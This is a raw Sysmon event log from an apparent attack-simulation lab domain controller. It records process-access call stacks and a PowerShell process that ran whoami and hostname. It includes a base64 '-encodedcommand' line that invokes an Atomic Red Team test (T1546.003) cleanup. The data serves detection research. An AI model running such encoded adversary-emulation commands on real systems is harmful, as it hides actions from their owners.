13:54:47.640{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006095Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.640{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006094Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.640{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006093Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.640{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006092Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.640{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006091Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.640{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006090Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.640{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-85A7-5FCF-F900-000000009101}4592C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006089Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.640{10ACEC4A-85A7-5FCF-F700-000000009101}8164316C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-85A7-5FCF-F900-000000009101}4592C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66db258b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66253195(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66252e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66d0474b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+662139fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66271ecb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66255530(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66255530(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66255530(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+662553c1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66247346(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66253879(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66253415(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66253195(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66252e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66d0474b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+662139fc(wow64) 154100x80000000000000006088Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.649{10ACEC4A-85A7-5FCF-F900-000000009101}4592C:\Windows\System32\whoami.exe10.0.14393.0 (rs1_release.160715-1616)whoami - displays logged on user informationMicrosoft® Windows® Operating SystemMicrosoft Corporationwhoami.exe"C:\Windows\system32\whoami.exe"C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-85A6-5FCF-374B-090000000000}0x94b370HighMD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9{10ACEC4A-85A7-5FCF-F700-000000009101}816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQA1ADQANgAuADAAMAAzACIAIAAtAEMAbABlAGEAbgB1AHAA 10341000x80000000000000006087Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.640{10ACEC4A-85A6-5FCF-F000-000000009101}48361104C:\Windows\system32\conhost.exe{10ACEC4A-85A7-5FCF-F800-000000009101}4272C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006086Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.640{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006085Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.640{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006084Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.640{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006083Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.640{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006082Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.640{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006081Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.640{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006080Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.640{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006079Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.640{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006078Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.640{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006077Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.640{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-85A7-5FCF-F800-000000009101}4272C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006076Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:47.640{10ACEC4A-85A7-5FCF-F700-000000009101}8164316C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-85A7-5FCF-F800-000000009101}4272C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66db258b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66253195(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66252e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66d0474b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+662139fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66271ecb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66255530(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66255530(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66255530(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+662553c1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66247346(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66253879(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66253415(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66253195(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66252e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66d0474b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+662139fc(wow64) 